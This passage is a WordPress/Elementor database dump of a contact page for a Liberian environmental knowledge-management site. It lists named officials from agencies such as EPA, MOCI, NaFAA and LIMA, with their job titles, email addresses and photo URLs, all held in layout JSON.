olumn\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca8ed2f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23974,3512,'_elementor_edit_mode','builder'),(23975,3512,'_elementor_template_type','wp-page'),(23976,3512,'_elementor_version','3.0.16'),(23977,3512,'_wp_page_template','default'),(23978,3512,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\"